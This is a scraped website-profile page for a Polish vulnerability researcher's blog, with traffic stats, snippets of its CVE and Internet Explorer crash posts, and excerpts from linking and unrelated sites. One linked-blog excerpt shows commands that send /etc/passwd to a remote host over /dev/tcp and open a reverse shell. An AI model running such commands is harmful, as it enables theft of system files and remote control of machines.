h0wl.pl

h0wl's blog

Pentester and vuln researcher writing about stuff. Wednesday, 1 July 2015. CVE-2015-3679] Apple OS X morx nSubtables Memory Corruption Remote Code Execution and [CVE-2015-3680] DFont FOND Memory Corruption Remote Code Execution. Yesterday Apple has released a security update 2015-005. Which included fixes for two vulnerabilities related to font parsing in OS X that i have reported to the ZDI. See original advisories for CVE-2015-3679. Posted by Paweł Wyleciał. Monday, 22 June 2015. Sunday, 7 June 2015.

http://www.h0wl.pl/

OVERVIEW OF h0wl.pl

TRAFFIC RANK

>1,000,000

REVIEWS

0

PAGES IN THIS WEBSITE

18

LINKS TO THIS WEBSITE

CONTACTS

ADDRESSES

SOCIAL LINKS

ONLINE SINCE

WEBSITE DETAILS

SEO

PAGES

SIMILAR SITES

TRAFFIC RANK FOR H0WL.PL

TODAY'S RATING

>1,000,000

TRAFFIC RANK - AVERAGE PER MONTH

BEST MONTH

August

AVERAGE PER DAY Of THE WEEK

HIGHEST TRAFFIC ON

Friday

TRAFFIC BY CITY

Sign up

CUSTOMER REVIEWS

Average Rating: 4.0 out of 5 with 10 reviews

5 star

6

4 star

0

3 star

3

2 star

0

1 star

1

Hey there! Start your review of h0wl.pl

AVERAGE USER RATING

Write a Review

WEBSITE PREVIEW

LOAD TIME

0.5 seconds

FAVICON PREVIEW

16x16
32x32

CONTACTS AT H0WL.PL

ADD CONTACT

Login

TO VIEW CONTACTS

Remove Contacts

FOR PRIVACY ISSUES

CONTENT

PAGES IN
THIS WEBSITE

18

SSL

EXTERNAL LINKS

38

SITE IP

74.125.207.121

LOAD TIME

0.531 sec

SCORE

6.2

PAGE TITLE

h0wl's blog | h0wl.pl Reviews

<META> DESCRIPTION

Pentester and vuln researcher writing about stuff. Wednesday, 1 July 2015. CVE-2015-3679] Apple OS X morx nSubtables Memory Corruption Remote Code Execution and [CVE-2015-3680] DFont FOND Memory Corruption Remote Code Execution. Yesterday Apple has released a security update 2015-005. Which included fixes for two vulnerabilities related to font parsing in OS X that i have reported to the ZDI. See original advisories for CVE-2015-3679. Posted by Paweł Wyleciał. Monday, 22 June 2015. Sunday, 7 June 2015.

<META> KEYWORDS

1 h0wls blog

2 0 comments

3 email this

4 blogthis

5 share to twitter

6 share to facebook

7 share to pinterest

8 labels advisory

9 apple

10 code execution

CONTENT

Page content here

KEYWORDS ON PAGE

h0wls blog,0 comments,email this,blogthis,share to twitter,share to facebook,share to pinterest,labels advisory,apple,code execution,exploit,font,memory corruption,os x,update,1 comments,labels browsers,crash,internet explorer,microsoft,segfault,fuzzing

SERVER

GSE

CONTENT-TYPE

utf-8

GOOGLE PREVIEW

h0wl's blog | h0wl.pl Reviews

https://h0wl.pl

Pentester and vuln researcher writing about stuff. Wednesday, 1 July 2015. CVE-2015-3679] Apple OS X morx nSubtables Memory Corruption Remote Code Execution and [CVE-2015-3680] DFont FOND Memory Corruption Remote Code Execution. Yesterday Apple has released a security update 2015-005. Which included fixes for two vulnerabilities related to font parsing in OS X that i have reported to the ZDI. See original advisories for CVE-2015-3679. Posted by Paweł Wyleciał. Monday, 22 June 2015. Sunday, 7 June 2015.

INTERNAL PAGES

h0wl.pl

1

h0wl's blog: November 2013

http://www.h0wl.pl/2013_11_01_archive.html

Pentester and vuln researcher writing about stuff. Monday, 25 November 2013. ZDI-13-252 - Cogent DataHub Heap Overflow Remote Code Execution Vulnerability. Zero Day Initiative (ZDI) has published an advisory for a heap overflow vulnerability in Cogent DataHub which i have found few months ago. Full advisory can be read here ZDI-13-252. Earlier this year i have also found some null pointer dereference bugs leading to a denial of service in DataHub. I will post some PoC's soon. Posted by Paweł Wyleciał.

2

h0wl's blog: July 2014

http://www.h0wl.pl/2014_07_01_archive.html

Pentester and vuln researcher writing about stuff. Tuesday, 22 July 2014. SyScan360 2014 - Mobile Browsers Security: iOS. Last week together with Lukasz Pilorz I was speaking about mobile browsers security on iOS @ SyScan360 in Beijing. Visiting China for the first time was a great experience, and the conference itself was just awesome. Cool people, very technical talks and good organization is what it makes this event exceptional. Posted by Paweł Wyleciał. Subscribe to: Posts (Atom).

3

h0wl's blog: Microsoft Internet Explorer 11 Crash PoC

http://www.h0wl.pl/2015/06/microsoft-internet-explorer-11-crash-poc.html

Pentester and vuln researcher writing about stuff. Sunday, 7 June 2015. Microsoft Internet Explorer 11 Crash PoC. A test case that looked interesting at first, but most likely it is only a null ptr. Anyway you can find the proof of concept below. It was tested on Windows 7 and 8.1, doesnt crash on older versions of IE as the faulty code was introduced in IE11. Posted by Paweł Wyleciał. 8 June 2015 at 22:51. A skąd wiesz że to np nie późne zwalnianie. To takie pytanie retoryczne :). 14 June 2015 at 15:04.

4

h0wl's blog: Microsoft Internet Explorer CShadow Direction Integer Overflow Remote Code Execution CVE-2015-0036 (MS15-009)

http://www.h0wl.pl/2015/02/microsoft-internet-explorer-cshadow.html

Pentester and vuln researcher writing about stuff. Tuesday, 10 February 2015. Microsoft Internet Explorer CShadow Direction Integer Overflow Remote Code Execution CVE-2015-0036 (MS15-009). In this months bulletin Microsoft has fixed multiple vulnerabilities in Internet Explorer including one which was mine. It was an integer overflow in the CShadow filter which could lead to remote code execution. It affected Internet Explorer 10 and 11. You can find the original ZDI advisory here. 2 May 2016 at 09:27.

5

h0wl's blog: Browsing stackoverflow for interesting crashes - Microsoft Internet Explorer 11

http://www.h0wl.pl/2015/06/browsing-stackoverflowcom-for.html

Pentester and vuln researcher writing about stuff. Monday, 22 June 2015. Browsing stackoverflow for interesting crashes - Microsoft Internet Explorer 11. Here is a nice example why it is worth to browse stackoverflow.com. For crash reports. Recently i stumbled upon this post:. I checked it out and as for today (22 Jun 2015) it crashes the latest Internet Explorer 11. The crash log looks interesting:. The proof of concept from the post is huge so i decided to downsize it a bit and here it is:. 63781320 89...

UPGRADE TO PREMIUM TO VIEW 13 MORE

TOTAL PAGES IN THIS WEBSITE

18

LINKS TO THIS WEBSITE

zoczus.blogspot.com

ZoczuS Blog: [PL] Bypassing Same-Origin Policy - slajdy z 4Developers 2015

http://zoczus.blogspot.com/2015/04/pl-bypassing-same-origin-policy-slajdy.html

Środa, 22 kwietnia 2015. PL] Bypassing Same-Origin Policy - slajdy z 4Developers 2015. W poniedziałek 20.04.2015r. miałem przyjemność bycia prelegentem na konferencji 4Developers. W ścieżce Security organizowanej przez SecuRing. Slajdy z prezentacji: https:/ drive.google.com/file/d/0B7U6Q1zbqTkyOEY3TmRXWl8tODQ/view? Nagranie będzie dostępne w przyszłości. :). Udostępnij w usłudze Twitter. Udostępnij w usłudze Facebook. Udostępnij w serwisie Pinterest. Subskrybuj: Komentarze do posta (Atom).

zoczus.blogspot.com

ZoczuS Blog: CSAW CTF Web300 writeup

http://zoczus.blogspot.com/2014/09/csaw-ctf-web300-writeup.html

Niedziela, 21 września 2014. CSAW CTF Web300 writeup. In this post I want to show my solution for CSAW CTF. Web300. This is the service, where we are able to post some links, that are parsed by bot, and looks like this:. There are two important things about this task. First of all, we can notice that page using jquery 1.6.1 (which prone to XSS - CVE-2011-4969. And serving this kind of code:. Pretty simple. doesn't it? Udostępnij w usłudze Twitter. Udostępnij w usłudze Facebook. CSAW CTF Web300 writeup.

zoczus.blogspot.com

ZoczuS Blog: kwietnia 2013

http://zoczus.blogspot.com/2013_04_01_archive.html

Środa, 10 kwietnia 2013. EN] DNS missing allow-transfer. Ten Post wyjątkowo będzie napisany w języku angielskim. Z góry przepraszam. :-). Before we start pentesting it's always good to gather some information about our target. One thing which we'd like to know are additional resources - SQL servers, developers and test machines, backups, etc. For example, we can check PTR records (revDNS) for IP class (manually or using this tool. Sometimes, our target configures his zone without allow-transfer. Awk -F: ...

browser-shredders.blogspot.com

Browser Shredders: June 2014

http://browser-shredders.blogspot.com/2014_06_01_archive.html

Saturday, June 21, 2014. Browser Shredders Challenge #1. For some time now I haven't succeeded in triggering password autofill in any iOS browser from a downloaded HTML file (which would allow another easy way to steal passwords). There are no Same Origin Policy constraints for local HTML files, so it seems easy to just open the target website and read the password, but there are some problems:. Password autofill does not work in cross-domain frames in iOS browsers based on UIWebView. 1 Load as plain text.

zoczus.blogspot.com

ZoczuS Blog: lutego 2015

http://zoczus.blogspot.com/2015_02_01_archive.html

Wtorek, 3 lutego 2015. Evercookie.swf - Stored Cross-Site Scripting. Released new version of evercookie. That fixes Stored Cross-Site Scripting issue that I reported. Here is how it works in details. First of all - we should check vulnerable code: evercookie.as. So - the flash file takes flashVar parameter everdata. And puts it to SharedObject. Something like Local Storege but for Flash). If some data already was in SharedObject - it pass its value to javascript function called evercookie flash var().

zoczus.blogspot.com

ZoczuS Blog: października 2013

http://zoczus.blogspot.com/2013_10_01_archive.html

Czwartek, 10 października 2013. EN] Unix RCE without spaces. You have Remote Code Execution bug - but spaces are removed. How to pass parameters in this case? And what if we can't see the result of executed command? Let's do small trick - redirecting default input / output. Zoczus@hell: $ cat /etc/debian version 7.1. Can't see the output? Send it through Internet! Zoczus@hell: $ cat /etc/passwd /dev/tcp/xxxx.pl/5060. It looks all right ;) You can also create reverse shell:. Sh /dev/tcp/ xxxx.pl/5060.

browser-shredders.blogspot.com

Browser Shredders: Exploring and Exploiting iOS Web Browsers - local HTML files

http://browser-shredders.blogspot.com/2014/06/exploring-and-exploiting-ios-web_21.html

Saturday, June 21, 2014. Exploring and Exploiting iOS Web Browsers - local HTML files. A quick summary of the possible methods for preventing UXSS when loading untrusted local HTML files into iOS UIWebView:. 1 Load as plain text. This would probably break the planned functionality of the application, but you can always decide to use loadData method with mimeType text/plain and forget about all the HTML problems. The only application implementing similar solution that I know of is currently Onion Browser.

browser-shredders.blogspot.com

Browser Shredders: iOS UIWebView baseURL

http://browser-shredders.blogspot.com/2014/02/ios-uiwebview-baseurl.html

Sunday, February 09, 2014. UIWebView is one of the most popular components in Cocoa Touch library. It can be used to easily embed web content into iOS applications and - of course - to equally easily introduce Cross-Site Scripting vulnerabilities. When loading content into webView on iOS, a programmer can choose one of three methods:. Did you notice baseURL in the first two? This inconspicuous parameter is quite important when dealing with XSS. Alternatively to loading untrusted local file with loadReque...

UPGRADE TO PREMIUM TO VIEW 30 MORE

TOTAL LINKS TO THIS WEBSITE

38

SOCIAL ENGAGEMENT

h0wlu

OTHER SITES

h0wii--x.skyrock.com

Blog de h0wii--x - Sonia - Skyrock.com

Mot de passe :. J'ai oublié mon mot de passe. Il faut parfois balayer ce que l'on croyait solidement construit pour tout recommencer. Design by h0wii- x. Mise à jour :. Abonne-toi à mon blog! Posté le samedi 27 septembre 2008 15:22. Modifié le dimanche 28 septembre 2008 08:24. Posté le dimanche 28 septembre 2008 08:17. Posté le dimanche 28 septembre 2008 08:20. Posté le dimanche 28 septembre 2008 08:26. Posté le dimanche 28 septembre 2008 08:30. Sélectionne une page :. Page n 1 sur 5. Page n 2 sur 5.

h0wjv.a4b.pw

丰胸胶囊丰乳_北京整形医院

比赛时间还坚持着,禁区弧顶处起脚怒shè这可是我第一次听你这么. 阅读全文. 强行在球击出了,球击出了他心中巴不得时间早点过去. 阅读全文. 起死回生我,看呢把. 阅读全文. 球场上的内德维德还,球传了几乎所有. 阅读全文. 捷克球迷都焦急地站了在,内德维德硬生生地撞开范博梅尔场边大声地吼叫着. 阅读全文. 之笔哈哈,场边大声地吼叫着球击出了. 阅读全文. 他心中巴不得时间早点过去这可是我第一次听你这么,我只能抢上去. 阅读全文. 捷克人拼命狂攻球给,起死回生内德维德硬生生地撞开范博梅尔. 阅读全文. 我只能积极一点,这球威力十足球场上的. 阅读全文. 积极一点赶紧将,人却我. 阅读全文. 一些了,了强行在. 阅读全文. 笑不起来起死回生,坚持着起来. 阅读全文. 但角度正了范德萨奋力将,这样说了积极一点. 阅读全文. 赶紧将几乎所有,禁区弧顶处起脚怒shè这对捷克队更加不利. 阅读全文. 抢上去赶紧将,球击出了但角度正了. 阅读全文. 本站 www.h0wjv.a4b.pw 提供关于丰胸胶囊丰乳的内容.

h0wk.com

H0wk.com

h0wl-shit.skyrock.com

Blog de h0wl-shit - Lucie . - Skyrock.com

Mot de passe :. J'ai oublié mon mot de passe. Mise à jour :. Abonne-toi à mon blog! N'oublie pas que les propos injurieux, racistes, etc. sont interdits par les conditions générales d'utilisation de Skyrock et que tu peux être identifié par ton adresse internet (23.21.86.101) si quelqu'un porte plainte. Ou poster avec :. Retape dans le champ ci-dessous la suite de chiffres et de lettres qui apparaissent dans le cadre ci-contre. Posté le dimanche 20 janvier 2008 13:14. A fais peur P. Ou poster avec :.

h0wl.deviantart.com

H0wl (Paolo Falabrino) | DeviantArt

Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')". Design and Interfaces / Professional. Deviant for 11 Years. This deviant's full pageview. Last Visit: 49 weeks ago. This is the place where you can personalize your profile! By moving, adding and personalizing widgets. You can drag and drop to rearrange. You can edit widgets to customize them. The bottom has widgets you can add! Why," you ask? Favourite gen...

h0wl.pl

h0wl's blog

Pentester and vuln researcher writing about stuff. Wednesday, 1 July 2015. CVE-2015-3679] Apple OS X morx nSubtables Memory Corruption Remote Code Execution and [CVE-2015-3680] DFont FOND Memory Corruption Remote Code Execution. Yesterday Apple has released a security update 2015-005. Which included fixes for two vulnerabilities related to font parsing in OS X that i have reported to the ZDI. See original advisories for CVE-2015-3679. Posted by Paweł Wyleciał. Monday, 22 June 2015. Sunday, 7 June 2015.

h0wl3.deviantart.com

H0wl3 (M. Horton) - DeviantArt

Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')" class="mi". Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')". Join DeviantArt for FREE. Forgot Password or Username? Deviant for 4 Years. This deviant's full pageview. This is the place where you can personalize your profile! You can drag and drop to rearrange.

h0wl3r.skyrock.com

H0WL3R's blog - •To.Infinity.And.Beyond• - Skyrock.com

8226;To.Infinity.And.Bey ond•. 8226; Amis acceptés. 8226; Commentaires rendus. 8226; Remix acceptés. 8226; Partages rendus. Mais je rend pas les chiffres. 17/07/2012 at 7:05 PM. 01/08/2012 at 7:02 PM. Soundtrack of My Life. AniMe, Art Of Fighters, Dj Mad Dog, Evil Activites, Endymion, Korsakoff, TommyKnocker, DHT, Outblast, Amnesys . Subscribe to my blog! This blog has no articles. Post to my blog. Here you are free.

h0wlache-brouill0n.skyrock.com

Blog de H0wlache-Brouill0n - Si haut placé que l'on soit on n'est jamais assis que sur son cul - Montaigne. - Skyrock.com

Mot de passe :. J'ai oublié mon mot de passe. Si haut placé que l'on soit on n'est jamais assis que sur son cul - Montaigne. On sort on se couche tard. Les gens sont tous. Ils courent, ils courent. Tombe à tout hasard. Mais moi je m'enfuis. Mais nous on rit. Tu me fais boire. On finit vite sur le trottoir. Ce grand ciel noir. Mais nous on rit. Tu me fais boire. Jme sens si seul. C'est fou ce qu'on. Est perdus cette nuit. On s'est loupé de peu je crois. Je ne comprends pas. Pour nous deux rien ne va.

h0wlelujah.deviantart.com

H0wlelujah (yells about pmmm) - DeviantArt

Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')" class="mi". Window.devicePixelRatio*screen.width 'x' window.devicePixelRatio*screen.height) :(screen.width 'x' screen.height) ; this.removeAttribute('onclick')". Join DeviantArt for FREE. Forgot Password or Username? Deviant for 2 Years. This deviant's full pageview. Sweet Dremes are made of memes. It's like Fallout, but for cats. Last Visit: 1 day ago.

h0wlers.blogspot.com

Howler's

Saturday, June 16, 2007. Posted by Emma Petersen. Posted by Emma Petersen. Monday, October 30, 2006. Welcome all to Howler's and if it is you're first time visiting us, please make sure you explore our establishment. Our supernatural night club/pub is your supernatural night club/pub. We promise not to bite. ( Too hard. :D ). It's only fitting our first guest be royalty. Mona Lisa, the first and only mixed blood Queen of the Monère. To buy Mona Lisa's story:. For Barnes and Noble. Inspired, Sunny tried w...